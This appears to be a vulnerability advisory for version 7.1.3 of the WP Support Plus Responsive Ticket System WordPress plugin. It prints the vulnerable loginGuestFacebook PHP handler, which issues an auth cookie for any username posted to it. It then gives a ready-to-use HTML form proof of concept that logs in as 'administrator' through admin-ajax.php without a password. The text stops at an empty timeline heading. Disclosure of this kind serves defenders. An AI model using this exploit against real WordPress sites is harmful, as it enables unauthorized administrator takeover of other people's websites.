WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation

Homepage:

https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/

Description:

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

File: wp-support-plus-responsive-ticket-system\includes\admin\loginGuestFacebook.php

<?php 
if($_POST['email']=='') die();

$user_id = username_exists( $_POST['username'] );
	
if(!$user_id){
	$user_id=email_exists($_POST['email']);
	if(!$user_id){
		$random_password = wp_generate_password( $length=12, $include_standard_special_chars=false );
		$user_id= wp_create_user( $_POST['username'], $random_password, $_POST['email'] );
		$full_name=explode(' ', $_POST['name']);
		$firstName=(isset($full_name[0]))?$full_name[0]:'';
		$lastName=(isset($full_name[1]))?$full_name[1]:'';
		wp_update_user(
			array(
			'ID' => $user_id,
			'first_name'=>$firstName,
			'last_name'=>$lastName,
			'display_name' => $_POST['name'],
			'role' => 'subscriber'
			)
		);
	}
}
	
$user_info = get_userdata($user_id);
	
if ( !is_user_logged_in() ) {
	wp_set_current_user( $user_id, $user_info->user_login );
	wp_set_auth_cookie( $user_id );
	do_action( 'wp_login', $user_info->user_login );
}
?>

Proof of Concept:

Use form below:

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Then you can go to admin panel.

Timeline: